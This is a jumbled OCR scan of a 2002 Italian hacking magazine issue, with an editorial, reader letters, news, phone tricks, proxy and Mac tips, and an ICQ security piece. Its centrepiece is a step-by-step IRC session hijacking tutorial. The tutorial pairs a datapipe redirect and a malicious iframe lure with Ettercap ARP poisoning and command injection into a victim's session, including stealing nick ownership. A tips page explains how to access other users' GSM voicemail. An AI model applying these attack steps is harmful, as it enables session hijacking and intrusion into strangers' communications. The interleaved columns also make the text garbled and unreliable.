Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
er (hãk’∂r)
“Persona che si diverte ad esplorare i dettagli dei sistemi 2€ CITÀ
di programmazione e come espandere
le loro capacità, a differenza di molti utenti, che preferiscono NOOPINUFBOBRLMIAZIONI
SOL OLI
imparare solamente il minimo necessario.” E ARTIC
il botto
Il primo numero passerà alla storia per
molte cose, alcune divertenti, altre meno. Per
quanto mi riguarda ho sorriso a una lettera
che ci chideva se con “tutti ‘sti teschi siamo
un’agenzia di necrofori o facciamo giorna-
li...”. Buona la seconda, anche se tutto som-
(fra schiaffi e applausi)
mato l’idea del necroforo non è da scartare a
priori. In realtà il teschio è evidentemente una
provocazione che punta a solleticare le corde
hacker journal 2 is out!
E
dell’ironia. Qualcuno è stato al gioco, qualche due; con più calma, passa- che ci ha gratificato. Più tecnica, dunque, più ap-
altro si è risentito, forse non cogliendo la vena ta la sbornia del primo im- profondimenti. Abbiamo forse peccato di ingenui-
ironica. Intendiamoci: noi vogliamo fare un patto, siamo qui a leggere il tà: non ci aspettavamo una reazione così netta e
giornale serio, con contenuti attendibili ma secondo numero del nostro decisa da parte della rete. Forum, guestbooks e
vogliamo anche, concedetecelo, divertirci un giornale. Di cose ne sono canali di chat sono letteralmente esplosi. E come
po’. Altrimenti andavamo a lavorare in ban- successe tante, e altre ne succederanno: un mer- avevamo intuito, la parola "hacker", è stata presa
ca... Poi, come accade in un disco, voglio rin- coledì mattina mi sono alzato, ho acceso il PC, e di mira e divenuta nodo di equivoci e litigate. Ma
graziare chi ci ha dato una mano: Bismark, mi è bastato dare un'occhiata alla posta e a qual- dare una mescolata alle carte, creare movimento,
Onda Quadra, SecurityInfos e tutto il panora- che sito per rendermi conto che, con tutta proba- passa anche per decisioni azzardate. Abbiamo tra
ma underground in generale: grazie di cuore. bilità, avevamo "fatto il botto". Con tutto ciò che le mani uno strumento di enorme potenzialità:
Ah, dimenticavo, questo è comunque un otti- comporta, è chiaro: non sono esperto di editoria, raggiungere tante persone con un mezzo carta-
mo “disco” da gustare fino un fondo... ma conosco il web e le sue manie, la sua efficacia ceo, così differente da quello digitale, è un’espe-
bomber78@hackerjournal.it e la sua velocità. Essere la prima rivista italiana a rienza esaltante ma piena di responsabilità. Mol-
trattare certi argomenti si portava dentro la pro- ti, anche tra coloro che lavorano/smanettano da
HJ: intasate le nostre caselle messa di polemiche, reazioni e affanni da parte di anni, hanno criticato non tanto i contenuti, quan-
Ormai sapete dove e come trovarci, appena una comunità che per sua natura è attenta ed esi- to l'immagine e la "facciata": opinioni che nasco-
possiamo rispondiamo a tutti, anche a quelli gente, pronta a dire la sua, e ci tiene a che la pro- no da chi ha già esperienza e conosce a menadi-
incazzati. Parola di hackers. SCRIVETE!!! pria voce sia ascoltata dagli altri. Era chiaro che to tutta la terminologia del settore. Proporsi in edi-
Anno 1 – N. 2 luglio 2002 sarebbero arrivati fischi e applausi: ma se abbia- cola anziché su un sito impone stravolgimenti nel
Boss: theguilty@hackerjournal.it mo deciso di giocare comunque questa partita è linguaggio: se si vuole fare divulgazione è neces-
a cura di Servizi Editoriali perché siamo convinti che ne valga la pena. Cer- sario usare parole che anche chi non bazzica abi-
Director: rayuela@hackerjournal.it
Editor: bomber78@hackerjournal.it to, alle baggianate e alle stupidità gratuite non si tualmente su packetstormsecurity può recepire. Al-
Technical editor: caruso_cavallo@hackerjournal.it farà mai il callo, ma tant'è: /dev/null. A tutti quel- trimenti si fa qualcosa a uso e consumo di chi già
Graphic designer: gfag8@hackerjournal.it
Contributors: cronopio@hackerjournal.it (images), li che invece ci hanno mosso critiche civili, anche è smaliziato e dentro l'ambiente, e che certamen-
Jacopo Bruno (cover picture), Daniele Festa pesanti e incazzate, ma costruttive, un enorme rin- te non ha bisogno di Hacker Journal. Per tutti gli
Publisher graziamento. Perchè se già da questo numero ab- altri, i curiosi, quelli che sono coscienti di avere an-
4ever S.r.l.
Via Torino, 51 biamo migliorato, è anche grazie a chi ci ha som- cora da imparare, cercheremo di affrontare argo-
20063 Cernusco sul Naviglio merso di messaggi, email e telefonate. La richie- menti via via più specifici e tecnici. Come sta scrit-
Fax +39/02.92.43.22.35
sta principale? Maggior specificità tecnica e credo to sui cartelli delle autostrade: stiamo lavorando
Printing
Stige (Torino) che siamo sulla buona strada. E anche qui un per voi. Con HJ vogliamo colmare un buco: of-
Distributore enorme aiuto lo ha dato la comunità, intasando frire un appoggio a chi si interessa di questi ar-
Parrini & C. S.PA. - 00187 Roma - Piazza le nostre caselle con idee, articoli e suggerimenti gomenti, soddisfare la curiosità di chi si avvicina
Colonna, 361- Tel. 06.69514.1 r.a./20134
Milano, via Cavriana, 14 - Tel. preziosi. Abbiamo ottenuto la collaborazione di per la prima volta al mondo underground. Non
02.754117.1 r.a. personaggi importanti del panorama under- ci interessano le lezioni morali; manifesti e “re-
Pubblicazione quattordicinale registrata ground, così come di gruppi di appassionati e di gole per essere un hacker” le lasciamo a chi ha
al Tribunale di Milano il 25/03/02
con il numero 190. singoli che hanno deciso che questa cosa può voglia di dedicarsi a politica e filosofia, noi vo-
Direttore responsabile: Luca Sprea avere un suo senso e una sua utilità: questo, più gliamo solo appassionare... A sentirci gente!
Gli articoli contenuti in Hacker Journal dei complimenti che abbiamo ricevuto, è stato ciò caruso_cavallo@hackerjournal.it - ICQ n° 66876309
hanno uno scopo prettamente didattico
e divulgativo. L’editore declina ogni
responsabilità circa l’uso improprio
delle “tecniche” e dei tutorial UN GIORNALE PER TUTTI
che vengono descritti al suo interno.
2 | www.hackerjournal.it
THE DAY AFTER IL PROSSIMO
NUMERO IN EDICOLA
i commenti “del giorno dopo...”
IL 20 GIUGNO:
OGNI 14 GIORNI
IL GIOVEDì
Ora comincia la sfida
Gymnasium la palestra di mente a tutti, specie al-
HJ: la “raccolta delle fir-
me” per allestire il vostro
l’amministratore dele-
gato (nella foto), quindi
HackMeeting
server/palestra è andata stiamo provvedendo ad TESCHI SÌ... 21.22.23 Giugno
al di là di ogni più rosea allestirlo in tempi brevi “Ragazzi la cover
aspettativa. per permettervi è davvero forte 2002 Bologna
Q
Il progetto pia- di sperimen- continuate così...”
ce pratica- tare... “C***o bello!
TPO - via Lenin 3, Bologna
Mettetene altri
uesta è la quinta edizione dell'hackmee-
arredano la ting italiano. Come le precedenti anche
cameretta da D**” quest'anno l'incontro si svolge in un
luogo autogestito, il Teatro Polivalente Oc-
cupato (TPO www.ecn.org/tpo) di Bologna.
O NO? E, come i precedenti, anche questo meeting è to-
“Cos’è talmente autogestito e autofinanziato. Non ci so-
una no né sponsor, né etichette.L'intera organizza-
rivista zione tecnico logistica viene portata avanti
durante l'anno da un collettivo virtuale
Entrate e firmate, please di necrofori?”
“Vanno bene per i che si ritrova nella mailing listhack-
ragazzini di 13 anni meeting@kyuzz.org.
forse neanche per
loro... “Bella caz***a”
3 | www.hackerjournal.it
INONDATI DA E-MAIL: www.hackerjournal.it
6 | www.hackerjournal.it
la prima volta che si avvicina dovre-
ste essere più chiari, insomma fare
una rivista che possa essere letta an-
che da chi di informatica e pirateria
non ne capisce granché.
Cmq complimenti avete creato
qualcosa di serio spero che la prossi-
ma uscita ci sia anche un Cd-rom al-
legato come giuda... ciao a presto
Maudit 56
LAVORI FORZATI
Complimenti 300 anni di questa attivi-
tà... cIàùZ
maximus
Sono un po’ perplesso sempre più In effetti molte società di software han- Accidenti, Lorenzo, le “scarne righe”
spesso si trovano sul mercato pro- no la cattiva abitudine di lanciare pro- come le definisci tu, bastavano da
grammi che a poche settimane dal dotti ancora poco testati. Lo fanno per sole a riempire tutto lo spazio della
lancio necessitano di patch e contro- rispettare le scadenze di mercato e per posta. Ci siamo limitati a riportare le
patch. uscire in contemporanea con la campa- cose salienti soprattutto per i lettori.
Ma dico io: non potrebbero testarli un gna pubblicitaria di lancio pianificata Adesso giriamo tutto questo agli altri e
po’ meglio prima di metterli in vendi- molto tempo prima. Risultato? E’ sotto vediamo che ne pensano. Scrivi anco-
ta, a volte sembra di avere a che fare gli occhi di tutti: programmi e videogio- ra, e, per te come per tutti gli altri, di-
con della vere e proprie beta. chi sono sempre più spesso instabili e venta un nostro collaboratore: uno per
Lexus necessitano di interventi postumi. K tutti, tutti x hacking. K
www.hackerjournal.it |7
news
HOT! ! RILASCIATA STEPHANIE PER OPENBSD 3.1
8 | www.hackerjournal.it
news
www.hackerjournal.it |9
news
HOT! ! VERMICELLO “PORCELLO”
10 | www.hackerjournal.it
news
www.hackerjournal.it | 11
news
! ASP’ETTA CHE TI BUCO
HACKBOOK
l nostro amico “Mantas” ci ha segnalato che il
I programma in asp “Snitz Forum”. Basta inseri-
http://pub47.ezboard.com/fsicurezza-
" KNOW YOUR ENEMY: netfrm3.showMessage?topicID=83.to-
REVEALING THE SECURITY TOOLS, re una piccola stringa di comando e si ottengono pic. K
TACTICS, AND MOTIVES OF THE di colpo tutti i dati relativi agli utenti registrati nel
BLACKHAT COMMUNITY data base compresi, e questo è grave, anche
quelli con diritti di amministrazione.
Autori: by The Honeynet Project (Editore), E’ facile ottenere dati personali e password,
L. Spitzner, B. Schneier, The Honeynet Project insomma entrare in possesso di tutit i dati
Pagine: 352 con sensibili.
CDROM Numerosi sono stati i Forum colpiti tra questi:
Anno: 2001 International Webmaster Association
Editore: Addison- (www.iwa-italy.org/) , www.village.it,
Wesley www.monteargentario.it, www.mirc-
ISBN: 0201746131 script.it, http://pippo.caltanet.it, eccette-
Livello: Intermedio / ra, eccetera. Per eliminare questa pericolosa
Avanzato vulnerabilità l’indirizzo rilevante in rete è:
Voto: 10/10
Costo: 39.99 $
! NETFILTER BUGGATO
12 | www.hackerjournal.it
news
www.hackerjournal.it | 13
pratica
IRC hijacking
Lo staff di Onda Quadra entra alla grande in HJ con un articolo sui problemi
di sicurezza delle sessioni IRC. Li abbiamo scelti perché sono competenti, simpatici
e hanno lavato la macchina a tutti quelli della redazione...
1 Premessa
Non è intenzione dell'autore del presente
Ettercap
E' un tool che permette di sniffare e fare hi-
jacking di una sessione utilizzando svariate
host locale 192.168.1.5 verrà rediretta
verso il server IRC di Azzurra. Ora non
vi resta che nattare(2) la porta 6667 sul
articolo incentivare alcuna azione atta a tecniche tra cui l'avvelenamento delle cache vostro router di confine per permettere
ledere la privacy, bensì con il presente si ARP che sarà quella di cui mi servirò in se- una connessione proveniente dall'ester-
intende dimostrare l'estrema facilità con guito; no verso l'host locale che esegue il da-
cui un utente malintenzionato possa met- tapipe.
tere a segno un attacco atto a minare l'in- ! LAN con due host Unix/Linux connessi a
tegrità della comunicazione durante una Internet. Il primo eseguirà il datapipe e ospi- (2)nattare: deriva da NAT (Network Ad-
sessione IRC. terà la sessione, l'altro host sarà quello dal dress Translation), permette la traduzio-
quale eseguiremo Ettercap per fare hijac- ne di un indirizzo IP in un altro, nel no-
2 Intro king della sessione che rimbalza su di noi. stro caso permette di mettere in relazio-
ne la porta 6667 del router di confine
Lo scopo di questo articolo è quello di il-
lustrare una tecnica che permetta di
prendere possesso della sessione di un
4 Hijacking con la stessa porta di un host interno al-
la rete locale (192.168.1.5) al fine di
permettere l'accesso da parte di host
utente al fine di inviare messaggi al ca- 4.1 Datapipe esterni.
nale ed interagire con ogni comando del Procuratevi un datapipe, personalmente
server IRC in genere. ho utilizzato datapipe.c di Jeff Lawson, 4.2 mIRC Bug
ponete in ascolto la porta 6667 median- Ora il vostro sistema è pronto per rice-
3 Requisiti
Ecco una breve lista di ciò di cui ho avuto
te l'utilizzo del datapipesu uno dei due
host che prendono parte alla vostra rete
locale e fate inmodo che il traffico in in-
vere una connessione da parte di un
utente remoto, il quale verrà reinstrada-
to tramite datapipe al server IRC in mo-
bisogno per mettere in pratica quanto ver- gresso su tale porta venga rediretto ver- do del tutto trasparente, non dovete far
rà detto in seguito. so il server irc sulla porta 6667, esempio: altro che trovare un utente che si con-
netta con il client IRC al vostro datapipe.
Datapipe attacker@datapipe:~$ ./datapipe Un utente malizioso potrebbe sfrutta-
Permette di redirigere il traffico in in- 192.168.1.5 6667 irc.azzurra.org 6667 re un bug abbastanza conosciuto del
gresso su una determinata porta dell'- mIRC 5.9 e 5.91 per far connettere la
host locale verso un host e una porta A questo punto qualsiasi connessio- vittima al proprio datapipe, la vulnerabi-
arbitrari. ne in ingresso sulla porta 6667 dell'- lità consiste nella possibilità di costruire
14 | www.hackerjournal.it
>>
una pagina web contenente un partico- Nel nostro caso l'IP sorgente è quello [00:32:19] <E4zy> ciao
lare tag html che permette di lanciare il dell'host su cui gira il datapipe ovvero [00:33:03] <victim> come va?
client mIRC e farlo connettere ad un ser- 192.168.1.5 e l'IP dell'host destinatario [00:33:17] <E4zy> tutto bene, grazie
ver arbitrario specificato all'interno della è quello del gateway cioè 192.168.1.1,
pagina html stessa. una volta scelti questi IP nella maniera ...verrà riportata come output di Ettercap
opportuna sarà possibile procedere al in un formato un po' meno leggibile, do-
<iframesrc="irc://vostro_IP:6667"> poisoning della cache ARP dei due host ve sulla sinistra viene riportato il traffico
mediante la pressione del tasto A. in uscita dal client diretto al server, men-
Basterà che la vittima visiti la pagina tre sulla destra il traffico in uscita dal ser-
web contenente il tag html appena illu- ettercap 0.6.3.1 ver diretto verso il client:
strato per causare la connessione della
stessa all'IP specificato. SOURCE: 192.168.1.5 <Filter: OFF ettercap 0.6.3.1
doppleganger illithid (ARP Based)
4.3 Ettercap DEST: 192.168.1.1 <Active Dissector: SOURCE: 192.168.1.5 < Filter: OFF
Ora che avete un utente potenziale ON doppleganger illithid (ARP Based)
connesso al server IRC tramite il vostro DEST: 192.168.1.1 < Active Dissector:
datapipe potete alterare la sessione di 5 hosts in this LAN (192.168.1.4: ON
tale utente a vostro piacimento. 255.255.255.0)
Ettercap permette di fare hijacking 5 hosts in this LAN (192.168.1.4:
in maniera semplice ed efficace utiliz- 1) 212.171.XXX.XX: 3600 <--> 255.255.255.0)
zando una tecnica conosciuta come 192.168.1.5:6667 silent 192.168.1.5:1028
ARP poisoning che consente di avvele- 2) 192.168.1.5:1028 <--> 192.106.224.132:6667
nare la cache ARP di host locali al fine 192.106.224.132:6667 silent PRIVMSG #ondaquadra :ciao
di alterarne il processo di risoluzione e 4 z y : E 4 z y ! ~ n o n e @ A z z u r r a N e t-
degli indirizzi IP in indirizzi MAC. Ora il traffico tra i due host risulta 65135.42-151.
Ettercap inoltre permette di inserire dirottato e possiamo osservare e modi- PRIVMSG #ondaquadra :come va
traffico arbitrario all'interno della ses- ficare a nostro piacimento i dati in in- net24.it PRIVMSG #ondaquadra :ciao.
sione provvedendo a ricalcolare i gresso/uscita.
campi sequence number e acknowled- Nell'esempio qui sopra la voce 1) si :E4zy!~none@AzzurraNet-65135.42-
gement number al fine di mantenere riferisce alla sessione stabilita tra il client 151.
la sincronizzazione della connessione. IRC remoto e il datapipe, mentre la vo- net24.it PRIVMSG #ondaquadra :tutto
L'utilizzo di un secondo host si ren- ce 2) rappresenta la sessione tra data- bene, grazie.
de necessario in quanto Ettercap pipe e server IRC.
NON permette l'avvelenamento della ASCII
cache ARP dell'host sul quale viene Datapipe: Programma che ridi- ASCII
eseguito, pertanto sarebbe impensa-
bile eseguire il datapipe e Ettercap
sullo stesso host per le limitazione ap-
pena evidenziate.
? reziona tutti i pacchetti tcp diretti
ad una porta su macchina ad un
altra porta su un altra (o stessa)
macchina.
Usando il tasto TAB è possibile pas-
sare da una metà schermo all'altra in
modo tale da poter intervenire sul lato
Per maggiori informazioni: client o sul lato server a seconda di do-
attacker@attack:~# ettercap http://www.s0ftpj.org/en/too ve si trova la finestra attiva.
ls.html
ettercap 0.6.3.1
www.hackerjournal.it | 15
pratica
192.168.1.5:1028
192.106.224.132:6667
propongo una serie di esempi un po'
più fantasiosi: LINKS
PR Type characters to be injected (max JOIN #canale LE VERSIONI
1000): PR Fa joinare la vittima in un canale a vostra DI ETTERCAP
2-151. scelta.
PRIVMSG #ondaquadra :sono stupi- NICK nickname In questo elenco
do!\r\n Cambia il nick della vittima in uno di vo- riportiamo tutti
tutto stro gradimento gli indirizzi
2-151. MODE #canale +o nickname rilevanti che riguardano
tutto Fa si che la vittima oppi nickname nel ettercap, da cui è possibile
2-151. canale specificato, il nickname potrebbe effettuare i download (anche
tutto essere il vostro. della versione 6.5.0) e in
ASCII KICK #canale nickname cui approfondire tutte le
Fa si che la vittima kicki nickname nel ca- sezioni trattate nell’artico
nale specificato. “made in Onda Quadra”.
PRIVMSG nickname :msg
Invia una query a nickname da parte
della vittima contenente il testo msg. Homepage:
ns ACCESS ADD mask http://ettercap.sourceforge.net/
Se il server IRC su cui si trova la vittima
dispone di servizi come Nickserv, Tar/GZ:
potete addare la vostra mask in modo http://ettercap.sourceforge.ne
da essere riconosciuti come proprietari t/index.php?s=download
del nick... non siate lameri :)
Questi comandi dovranno essere Changelog:
sempre seguiti dai caratteri \r\n che ne http://ettercap.sourceforge.ne
permettono l'esecuzione da parte del ser- t/index.php?s=history
ver.
Quando inviamo comandi al lato ser- Provando a sniffare una vostra sessio-
ver è sempre bene farli seguire dai carat- ne sarete in grado di evidenziare ulteriori
teri \r\n che sostituiscono la pressione del comandi utilizzabili in tale contesto.
tasto INVIO che ne permette l'esecuzione,
ecco il risultato del comando precedente:
Debian package:
tata. un altro. Ciò consente di utilizzare http://ettercap.sourceforge.net
Il client IRC della vittima sarà l'unico all'interno di una rete indirizzi IP /index.php?s=download&p=binary
a non visualizzare tale frase pertanto non ufficiali, anche se corrispondo
non desterà in lei alcun sospetto, il a numeri IP realmente esistenti CVS tree (cvsweb):
messaggio sarà in ogni caso visibile da su Internet. Il computer usa questo IP http://cvs.sourceforge.net/cgi
tutti gli utenti del canale. nelle comunicazioni interne alla rete. -bin/viewcvs.cgi/ettercap
L'iniezione di caratteri all'interno Quando il computer deve comunicare
della sessione TCP non si limita a forni- con l'esterno, il NAT gli attribuisce
re la possibilità di inoltrare messaggi al un numero IP ufficiale con il quale
canale da parte della vittima, bensì viene visto dall'esterno. Il NAT, inoltre,
permette l'esecuzione di ogni genere di abbinato al ICS, permette a più PC
comando sul server IRC alla sola con- in rete locale, di condividere un
dizione di conoscere il protocollo a li- singolo accesso ad Internet.
vello applicazione con cui il client e il
16 | www.hackerjournal.it
tips &tricks
>> NEWBE
Nokia 3210-3310-5110-6110-8210
Ecco alcuni trucchi funzionati con modelli
Nokia.
*3370# migliora la ricezione del segnale
ma aumenta il consumo del telefonino
il funzionamento del cellulare di ulti- l’unica controindicazione è che (#3370# disatt.)
ma generazione, c’è l’insanabile vo- l’operatore dopo una ventina di giorni *4720# fa consumare meno il telefonino
glia di provare subito a chiamare… blocca la scheda telefonica: bisogna ma diminuisce la ricezione del segnale
Usare il telefonino è prioritario, poi vedere se il gioco vale la candela... (#4720# disatt.)
viene il resto. *#0000# Visualizza la versione del softwa-
Acquistare un tri-band, con tecno- re del cellulare
logia GPRS o Bluetooth , capace di in- Vi piacerebbere mandare messaggi *#92702689# oppure #*war0anty#
viare e ricevere mms e usarlo solo per alle segreterie telefoniche degli utenti Premendo il tasto navy si scorre nelle se-
chiamare e rispondere è un po’ come GSM, anche se non hanno abilitato il guenti voci:
possedere un paio di accendini e sfre- servizio? Come? Il principio è davvero - Numero seriale (Serial No.)
garli tra loro, con fare neanderthalia- semplicissimo. - Mese e Anno di produzione (Made)
no, per ottenere la combustione ne- L'abilitazione della segreteria te- - Data di acquisto (Purchasing date)
cessaria ad accendere una sigaretta… lefonica cellulare in realtà non è altro - Ultima riparazione (Repaired)
Ma, prescindendo dai comandi tra- che una deviazione delle chiamate in da questo menu si esce spegnendo il tele-
dizionali, codificati nei manuali, esi- arrivo verso un secondo numero, fonino.
stono combinazioni di tasti che con- molto simile al proprio numero di te- *3370# e #3370# Per attivare e disattiva-
sentono di ottenere un qualcosa in lefono. re l'Enhanced Full Rate, dopo un reinizializ-
più… Tra tutti i trucchi rintracciabili Chiamata ---> Numero 1 ---> zazione del telefono. L'EFR è una modalità
anche in rete ce n’è uno davvero utile. Numero 2 (Cellulare) (Segreteria) di funzionamento, non supportata da tutti i
Si tratta di un’op- Dunque, se con un altro cellulare gestori di rete, che permette di migliorare la
zione valida pra- GSM chiamiamo DIRETTAMENTE il se- qualità dell'audio a danno della durata del-
ticamente per condo numero, quello della segrete- la carica della batteria.
tutti i cellulari che ria, potremo accedere al servizio, an- *4720# e #4720# Per attivare e disattiva-
impedisce ad che se l'utente non ha attivato la de- re l'Half Full Rate dopo la reinizializzazione
eventuali ladri di viazione chiamate verso quell'altro del telefono. Il risultato è simile a quello
usare il impune- numero! Quando l'utente accenderà il dell'EFR (audio migliore, batteria più breve).
mente il vostro cellulare, riceverà un messaggio SMS nn# Visualizza il numero telefonico memo-
telefonino. Per che lo avvertirà della presenza di un rizzato nella posizione nn della rubrica.
ottenere il numero di serie del vostro certo numero di messaggi nella segre-
cellulare, battete i tasti: *#06#. Un co- teria. Ecco a quali numeri telefonare: Motorola V3688
dice a 15 cifre apparirà sullo schermo. Per i cellulari TIM: (p)(p)(p)191(p)1(p) ok attiva EFR
Questo codice è unico. Scrivetelo e Prefisso / 55 / Numero (p)(p)(p)191(p)0(p) ok disattiva EFR
conservatelo preziosamente. Se vi ru- Per i cellulari OMNITEL:
bano il cellulare, telefonate al vostro Prefisso / 20 / Numero. K Siemens C25, C35, M35, S35
operatore e dategli questo codice. Il *#0606# mostra il codice segreto, ma so-
vostro telefono potrà essere completa-
mente bloccato, anche se il ladro cam-
bia la scheda SIM. ? SMS: Sistema con il quale i telefoni
cellulari ricevono brevi messaggi
di testo, fino a 168 caratteri.
lo senza scheda.
*#002# Cancella tutte le deviazioni di
chiamata. K
www.hackerjournal.it |17
in rete
>>
NASCONDERE IL PROPRIO IP CON I SERVER PROXY
Navigare anonimo
Quando navighiamo in Internet veniamo catalogati,
riconosciuti, ci scaricano sul PC i "biscottini" per schedarci
ma c'è, fortunatamente, un modo per sfuggire a tutto ciò...
>> Anonymizer
F
orse non tutti lo
sanno, ma esiste
un Grande Fratel-
e i suoi fratelli...
lo estremamente
ingombrante e curioso che ci os- Sempre in tema di anonimato Anonymi-
serva. Anzi ci spia. E come mezzo zer (http://www.anonymizer.com) è un
privilegiato per carpire informa- altro sito che consente di navigare in mo-
zioni sul nostro conto personale do completamente anonimo, scherman-
utilizza proprio Internet e le no- do l'IP. Ma non è il solo. Iprive.com
stre connessioni alla rete. (http://www.iprive.com/bar/in-
Basta collegarsi ad un sito, ma- dex.html) propone una barra di navi-
gari un portale con molto traffico, >> Il garante gazione da integrare al browser (Explo-
come quelli delle grandi società rer 5). Si scarica in formato zippato e si
che operano in Internet, e il no- della Privacy installa come un accessorio di Explorer
stro computer comincia a stringe- consentendo di navigare in segreto scri-
re una serie di relazioni con il ser- Per evitare questo tipo di intrusioni si vendo l'indirizzo non nello spazio abitua-
ver a cui ci si è collegati. Relazio- possono usare dei server proxy ovvero le del browser ma in quello della barra
ni che si riducono sostanzialmen- dei server che garantiscono l'anonimato aggiuntiva.
te ad uno scambio di informazio- frapponendosi tra voi e il PC remoto che Surfola (http://www.surfola.com) è
ni, come il rilascio da parte del a cui vi state collegando ed evitando la un serve proxy molto frequentato che of-
server stesso dei cosiddetti co- trasmissione di dati. fre lo stesso servizio di Anonymizer e co.
okies, ovvero i "biscottini". Uno dei più noti ha un nome che è Altri siti che risultano rilevanti sono
Si tratta di piccoli file di testo che quasi premonitore "Anonymouse" h t t p : / / w w w . r e w e b b e r. d e ,
vengono registrati sul disco rigido (http://nonymouse.com/) e la sua http://www.ultimate -
del computer, spesso senza che home page è piuttosto spartana. anonymity.com e http://www.spa-
l'utente se ne accorga, attraverso Qui le opzioni sono davvero limitate. ceports.com. K
i quali, il server che li ha rilascia- E' disponibile uno spazio dove digitare
ti può riconoscere l'utente ogni l'indirizzo del sito che si vuole visitare in
volta che questo si collega al sito. tutta sicurezza e completo anonimato. ANONIMITY 4 PROXY
Praticamente si viene schedati e Navigando dalla finestra di Anony-
ad ogni navigatore viene dato, mouse si è al sicuro dai "Cookies" ma
anche se solo virtualmente, un non solo, infatti il sito cripta l'indirizzo e
volto. i dati del computer del navigatore e ri-
Ma questo è solo uno degli esem- esce anche a sanare alcuni problemi di
pi banalissimi. In realtà i grossi compatibilità che generalmente nasco-
gruppi che operano in Internet no visitando siti che utilizzano elementi
hanno proprio bisogno di censire in Flash o Shokwave. Due programmi
e riconoscere i propri utenti, per- visuali di largo consumo per animazioni
ché questi rappresentano al mo- su web.
mento attuale la loro unica vera Quando l'amministratore di un ser- All'indirizzo
ricchezza. ver scandaglia le visite al sito può rileva-
http://www.inetprivacy.com/dl.ht
re in tutta comodità gli indirizzi IP di chi
Proxy Server: Server che si si è collegato, ma chi ha avuto l'accor- m#a4proxy si può scaricare il
18| www.hackerjournal.it
mac Hack
MAMAMAMAMAMAMAMAM >>
GABOLE E TRUCCHI IN AMBIENTE MAC
Mac Attack
!
e qualcuno vuole scrivere
S
usando un mittente "falso"
può farlo in tutta tranquillità.
I software di posta elettroni-
ca consentono di barare
senza problemi La “mela” ribolle di mille trucchetti pronti per l’uso.
Gli unici dati che vengono ri-
chiesti come indispensabili sono Tra questi la possibilità, davvero alla portata di tutti,
la @ seguita dal nome del provider nel-
l'indirizzo. Si può quindi scrivere n o- di rintracciare il mittente segreto di una e-mail,
mefalso@nomeprovider.it
senza problemi per account e per nome magari per risalire allo “spammatore mascherato”
dell'utente.
Se, ad esempio, riceviamo una e-mail
sospetta magari con un indirizzo di po-
sta Sharon.Stone@iol.com pos- dati basta collegarsi all'indirizzo www.ri- >> Netscape download
siamo nutrire il sospetto che non ce l'ab- pe.net/cgi-bin/whois. Il sito presenta subi-
bia inviata l’attrice americana (sic!), ma to in home page il motore di ricerca e una State scaricando, vi chiamano al telefono
facciamo a capire da dove arriva? sezione in cui inserire l'indirizzo ip ricavato come fare a rispondere e riprendere il
Se possedete un Mac e il vostro client di secondo il procedimento illustrato. Una downoload dal punto dove è stato inter-
posta è Outlook Express l’operazione è volta inserito l'indirizzo, basta dare il via rotto? Semplice: staccate il cavo telefonico
davvero semplicissima: dovete seleziona- alla ricerca e il gioco è fatto. In pochi se- mentre siete ancora connessi ad Internet .
re la voce "origine html" dal menu "Visua- condi avremo tutti i dati salienti e potremo Quando per riprendere lo scaricamento è
lizza". svelare con assoluta certezza se la mitten- sufficiente reinserire il cavetto della linea
Compariranno una serie di dati proprio, te è la bella Sharon oppure no... Ma non telefonica e connettersi al proprio provi-
tra cui l'indirizzo ip composto in genere finisce qui. Se per caso disponiamo di un der come si fa di solito utilizzando PPP o
da quattro gruppi di numeri divisi da al- nome e un cognome e vogliamo as- Remote Access o simili. A connessione
trettanti punti (es. 62.110.12.221). Inol- sociarlo ad un indi- effettuata tornate su Netscape. A questo
tre, compariranno anche il nome del ser- rizzo di posta, punto vedrete ancora la finestra del
ver di posta e altri dati utili. Ma il più possiamo usare download anche se il file non è attual-
importante in assoluto rimane proprio dei servizi che for- mente in scaricamento, ora cliccate sul
l'indirizzo ip, attraverso di esso si può in- niscono tutte le bottone Cancel ed dopo cliccate sul link
fatti risalire ad informazioni precise sul informazioni del sulla pagina dalla quale avevate comin-
server: si potrà sapere di quale azienda caso come ciato lo scaricamento per la prima volta e
si tratta, oppure in quale città il server è www.infospa- Netscape ricominciare a scaricare giusto
fisicamente collocato. Per avere questi ce.com dove aveva interrotto in precedenza. K
o www.pronto.it. K
www.hackerjournal.it |19
sicurezza
ICQ
è un pro- default si “starta” quando viene attivata
gramma (di la connessione in rete, e che manda al
origine server centrale di ICQ una cosa del tipo:
israeliana) "Ehi, l'uin 12345678 è on line!"
che consente Gli altri utenti potranno dunque con-
a moltissimi tattarci: ogni utente ha una "lista" nella
utenti (siamo quale sono immagazzinati i vari "contat-
ormai nell'ordine dei milioni) di chattare, ti" (identificati dall'UIN), e quando essere non raggiungibile, o altro. Esisto-
scambiare file, inviare email e molte altre qualcuno è on line insieme a noi, vedre- no anche altre operazioni che due uten-
cose tra loro; in modo piuttosto differen- mo il suo nick lampeggiare e passare ti possono fare: stabilire una sessione di
te di come avviene in una normale chat nella lista ON LINE USER (tutto è custo- chat simile a quelle di IRC, in modo da
IRC (quelle a cui vi collegate col MIRC, mizzabile), e sarà dunque semplicissimo partecipare in più di due, spedirsi file
tanto per capirci). contattarlo. Sembra una cosa macchino- etc... Tutto questo, durante una sessione
Ogni utente ICQ si registra tramite un sa, ma in realtà è geniale, e somiglia ordinaria, avviene sempre in modalità
nick, una password e, soprattutto, un moltissimo al telefono: per trovare qual- diretta. Detto così, ICQ è la perfezione
UIN: questo UIN è l'unico cuno e mantenere contatti on line è as- della comunicazione via chat: semplice,
dato davvero importante solutamente più pratico che non andare veloce, affidabile. Ma è anche sicuro?
(assieme alla pas- in giro per centinaia di server irc e rispet- Certamente no...
sword) e identifica ogni tivi canali a fare whois di !*nick!*... o no?
utente in modo univoco Naturalmente esistono anche molti
(non può dunque accadere altri sistemi simili, vengono chiamati si- >> Dove sta la vera
che 2 utenti abbiano stesso stemi di istant messaging (come quelli di fregatura?
UIN), mentre il nickname AOL o di Microzozz). Curiosità: ICQ
può essere anche lo stesso non è acronimo di nulla, questo nome fu
di altri 2000 utenti. Ogni scelto solo perché in inglese suona come ICQ è un sistema molto complesso,
utente ha il suo ICQ, che di i seek you (io ti ho visto)... con una sua architettura e un suo pro-
20 | www.hackerjournal.it
>>
ma poco sicuro!
ro una marea di programmini per ramo delle directory fino a c:\ e quin-
flood&co che agiscono semplicemente di downloadare qualsiasi file.
inviando una quantità enorme di mes- Nelle nuove versioni del client que-
saggi alla vittima fino a causarne un sta vulnerabilità è stata eliminata.
ping timeout e quindi una disconnes- Altri problemi giungono dalla ge-
tocollo, che consente tutte le operazio- sione. stione del trasferimento file: come in
